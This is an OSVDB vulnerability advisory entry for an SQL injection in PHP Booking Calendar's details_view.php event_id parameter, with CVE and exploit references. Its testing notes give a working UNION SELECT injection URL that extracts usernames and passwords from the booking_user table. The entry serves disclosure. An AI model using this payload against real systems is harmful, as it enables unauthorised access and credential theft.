PHP Booking Calendar details_view.php event_id SQL Injection

2006-03-25T21:38:21
ID OSVDB:31624
Type osvdb
Reporter OSVDB
Modified 2006-03-25T21:38:21

Description

Manual Testing Notes

http://[target]/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user

References:

Vendor URL: http://www.jjwdesign.com/booking_calendar.html ISS X-Force ID: 25580 Generic Exploit URL: http://www.milw0rm.com/exploits/1610 CVE-2006-1422 Bugtraq ID: 17230